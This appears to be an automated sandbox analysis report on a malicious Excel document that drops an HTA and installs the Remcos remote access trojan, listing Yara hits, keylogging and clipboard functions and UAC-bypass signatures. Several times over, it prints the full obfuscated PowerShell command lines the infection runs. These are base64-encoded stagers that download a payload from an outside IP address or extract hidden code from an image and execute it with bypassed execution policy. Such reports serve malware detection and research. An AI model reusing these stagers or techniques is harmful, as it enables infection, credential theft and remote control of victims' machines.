                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,30_2_004168FC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,30_2_0040B749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,30_2_0040A41B
                    Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: Yara matchFile source: 30.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.powershell.exe.12a41af0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b940b0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.powershell.exe.12a41af0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b940b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4072, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 30.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.powershell.exe.12a41af0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b940b0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.powershell.exe.12a41af0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b940b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000011.00000002.873711232.000000000248E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872848173.000000000088E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872488880.0000000000835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872848173.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001E.00000002.516366128.00000000007D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872488880.0000000000851000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1908, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4072, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Contains functionalty to change the wallpaper
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0041CA73 SystemParametersInfoW,30_2_0041CA73

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 30.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 30.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 30.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 29.2.powershell.exe.12a41af0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 29.2.powershell.exe.12a41af0.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 29.2.powershell.exe.12a41af0.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 14.2.powershell.exe.12b940b0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 14.2.powershell.exe.12b940b0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 14.2.powershell.exe.12b940b0.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 29.2.powershell.exe.12a41af0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 29.2.powershell.exe.12a41af0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 14.2.powershell.exe.12b940b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 14.2.powershell.exe.12b940b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 3112, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 3744, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: RegAsm.exe PID: 4072, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Excel sheet contains many unusual embedded objects
                    Source: QPS-36477.xlsOLE: Microsoft Excel 2007+
                    Source: QPS-36477.xlsOLE: Microsoft Excel 2007+
                    Source: 58430000.0.drOLE: Microsoft Excel 2007+
                    Source: 58430000.0.drOLE: Microsoft Excel 2007+
                    Microsoft Office drops suspicious files
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\newthingtobeonlinefor[1].htaJump to behavior
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                    Wscript starts Powershell (via cmd or directly)
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
